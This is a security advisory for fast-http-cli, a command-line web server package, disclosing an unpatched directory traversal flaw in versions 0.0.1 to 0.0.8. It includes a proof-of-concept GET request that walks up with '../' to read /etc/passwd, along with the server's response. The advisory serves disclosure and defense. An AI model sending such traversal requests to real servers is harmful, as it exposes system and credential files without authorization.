Neverending Package Mountain
fast-http-cli

Directory Traversal

Severity: high

Overview

fast-http-cli is the command line interface for fast-http, a simple web server.

fast-http-cli is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url.

Example Request:

GET /../../../../../../../../../../etc/passwd HTTP/1.1
host: localhost

and server Response:

HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked

{contents of /etc/passwd}

Remediation

No patch is available for this vulnerability.

It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.

Vulnerable versions

0.0.1
4 years ago
0.0.2
4 years ago
0.0.3
4 years ago
0.0.4
4 years ago
0.0.5
4 years ago
0.0.6
4 years ago
0.0.7
3 years ago
0.0.8
3 years ago

Unaffected versions

Advisory timeline

  1. Published

    Advisory published
    Sep 28th, 2017
  2. Reported

    Initial report by Liang Gong
    Jun 28th, 2017